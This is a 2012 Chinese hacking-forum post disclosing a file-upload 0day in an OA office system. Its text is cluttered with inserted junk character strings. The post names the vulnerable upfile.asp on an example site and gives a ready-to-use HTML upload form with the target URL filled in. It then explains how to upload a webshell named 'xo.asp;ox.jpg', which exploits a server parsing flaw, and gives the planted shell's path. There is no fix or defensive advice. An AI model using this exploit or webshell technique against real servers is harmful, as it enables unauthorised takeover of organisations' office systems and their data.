找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2152|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞5 w$ e: S" u+ e  m
- |1 [7 O/ l/ l/ I: z
系统介绍:% Z/ n6 x1 F" o( c0 U
4 ^6 Z9 q( a5 V+ k& ?
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
$ P& v* X3 C  a( f# _8 e& ]7 O6 `# i. E2 U( P" v8 j
主要功能:
  \$ F- s4 I) ?7 V公司通告
7 m" X& Z: K  p0 O  {0 p+ r工作计划 , y2 T! K! n4 c! m" m3 {
通讯助理
1 ?7 w0 G- T5 R5 ]! I7 a: @' T客户资源
4 E3 D' Y7 B  T8 p9 |. Y* u我的公文 " k6 r' `2 B" K/ ~1 J  }
公文传阅 * X( @/ @; `" |  ^+ C7 y
公共资源 6 T! {: V7 e* G3 D
资源预约
2 _: L/ C0 G. G8 V; D1 C7 j1 C今日考勤
% S% D# H8 A8 q# u3 \6 |个人计划
9 O* [9 F% _, I$ n个人通讯录
1 [7 P$ W4 Y, ~" b0 D8 \/ H( m个人基本档案
( o( r7 N1 r- G* F3 t# t" R未读邮件 : G+ h' ^0 j! I7 l* p/ `3 o
发邮件
% ~  X& E. ?/ w( h9 T5 h收件夹 ( g! Z. o2 y/ r: F: D) S' H* d. C0 @
寄件夹
* n8 |) A+ V; {( d& ~6 B* u% V7 ]5 y网络硬盘
! ~: L, t6 [% D' [网络会议
9 c6 F) d: X) t* \* G  H5 t网络调查
5 C7 h" \) V9 Z+ T" _. {交流论坛: c! c& \( N  ~+ i9 c2 R/ o1 V# C
7 \: ?! i9 u" f- r& i! {) @
有兴趣测试的朋友可以下源码看看
0 t* S& C3 f3 ]9 }0 ]" \2 d) E/ ]9 E, H6 f- ~
源码下载:
. i% y: R+ W; N  T
; `2 _5 j3 m# b  ~; e- }http://www.mycodes.net/30/4750.htm
/ \% W9 O9 d  e7 p) R/ J' t" H6 U
1 @' O3 [* g6 _- x漏洞介绍:
, ?; P- u; J1 k3 c5 w2 T9 g: H6 b7 i# t: f; F9 l% K3 X3 {$ g
由upfile.asp上传文件漏洞引起; I7 j0 J% r6 G3 w, k7 G8 j

/ y) d: Z7 v8 ^1 L1 m测试方法:
" E' b3 S( ~. m- ^  C7 u7 W+ ]' X0 z+ A$ ?1 B0 Z
使用名小子上传http://www.itlynn.com/upfile.asp即可
8 h2 H8 i/ m3 I+ I3 P4 Y7 q* ^  q0 c' ?, v+ H1 n& N1 n, i1 p) ]
如果upfile.asp文件被删除不存在。$ P* q, b; l9 \/ B+ k5 w) f

6 F0 W. l/ |! Y( k9 S+ v* }/ r: Y  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp3 b: w+ e- N" R  t: d0 T9 X

/ A( {# r( X. [* _! D如果存在那么将如下代码保存为upfile.html。+ ~4 M  h& D8 R1 J# Z$ F1 C$ ^

9 g3 c: U- j& e: a2 U+ W! V然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
- b$ A" Y' T+ R; p) Q9 }8 s8 V- K+ S( Q  W' T3 k' y2 R, F

3 a" S9 M9 N, }; f' T
0 |; f* t% E7 J! [/ Q; l01 <table border='0' align="center" cellpadding="5">
1 W* }, u8 L, E8 ^( C# w2 m8 k  E: q! ]# |7 B# G) ]
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> # ]# G/ X+ ^' u4 W3 F
$ G1 ^# O, ~  ]( B" W1 r
03 <tr> 3 Q3 h# O1 Z) |" v/ n

) U3 ^. u/ ~! O! F' j( l. [$ a04             <td>报错:</td> 1 l3 u* t; f. z3 u2 Y

8 w# a+ r& z6 J* d05             <td><input type='radio' name='errnumber' value='0'> 3 `; j  }$ z; A* m. U/ ]
5 s4 M- U% m2 k! N3 a% \3 @
06               自动更名
5 K$ V  @* Z% L# ?; q/ [0 \2 ~+ o: I3 x9 N3 `, h
07               <input type='radio' name='errnumber' value='1' checked> 9 ]  s1 q: i7 r% O

5 s0 |, D* g' r7 ]3 v8 h4 M& x; g08               报错方式 $ x5 V* ], f9 V  B% p
6 g4 Y! z: Y9 k; r
09               <input type='radio' name='errnumber' value='2'>
+ |; p) e5 I' ^$ V+ d$ r
5 U: ^! n. \  q. S7 |10               直接覆盖</td> 7 @2 E; n5 M1 q5 l2 z

* n: X! m$ Y+ \6 x8 k# u9 t9 i3 U& j11           </tr>
  h9 w6 Z' [2 E* w: v! y. u) w& a/ l7 i% r- R
12           <tr>
, X9 N3 K" }0 q' L
  X& G' K* z1 o+ n0 }; r13             <td>主题:</td> ( Q. {4 E5 h0 ?9 P

) k( h" }) T. s: w14             <td><input type='text' name='filename' size='30'></td> + n5 C; s% w) T4 ~$ j7 U

! O' v( {; `& z: g1 \& j' R15           </tr>
" V8 Q6 T  }2 G3 |  x! o0 M6 g7 E, M+ y6 F8 ~9 T! E
16           <tr>
( N* [- ?3 P: l  c6 e& R5 e- i; V1 E" Q
17             <td>文件:</td>
& k% g5 e" K0 D: X1 x: }
: [6 ]! l" q: S* O% i18             <td><input type="file"name="fruit"size="30"></td>
7 d3 H3 h) j9 `! j0 c1 G" Y, r, w) Q- |0 T! E* n/ M+ e! }
19           </tr>
) Z5 Y* k# I- e* B1 [# Q$ T& c" r% l) ]- U
20           <tr> 1 _- ^: Y; d9 h" \

0 f( f3 _+ Z) ]2 b" a5 S3 i21             <td valign='top'>简介:</td> ' m& y( Z& n+ }; E4 ?/ o* u- {

. m6 a' e4 g' {7 r22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
% F" q$ [' b# {" E8 Y2 s
4 ?( E/ u8 W" B; }) A* c23           </tr>
5 S- ^: Y- g7 h, v7 X: ^& R1 N# `# Z) [* ]
24   $ _# `+ w' S  f5 |! Y

$ V" f8 o7 R# P. s7 Z4 I25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 6 U9 r: \, w& p/ X" v' L
* q! @& Y# q$ E% J) I
26           </tr>
: i' R. P5 n1 U5 \6 \7 ]
# K, Z" b' Y" e  @; a1 G2 B27         </form> ) h+ u! R9 _0 K  }# I! V! t
/ `* |. ~# O. F$ L+ h! Y
然后打开上传一个文件名为xo.asp;ox.jpg的文件。) j; Q4 a, I3 |& [0 q  Z

% s! ^$ `1 b1 W# g$ F   H  r( l# I; f& S6 D0 ]2 y+ s

! H! U9 o" \$ M: ]上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg0 i7 a3 @' y( t5 v. m+ j
5 n2 T1 N' Q* ]4 g9 ]; g) }
此漏洞需要配合解析漏洞利用。# r6 i) h3 l3 o! T. E- G: |

; |; H. G% ]: v( i4 N; V# J$ E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表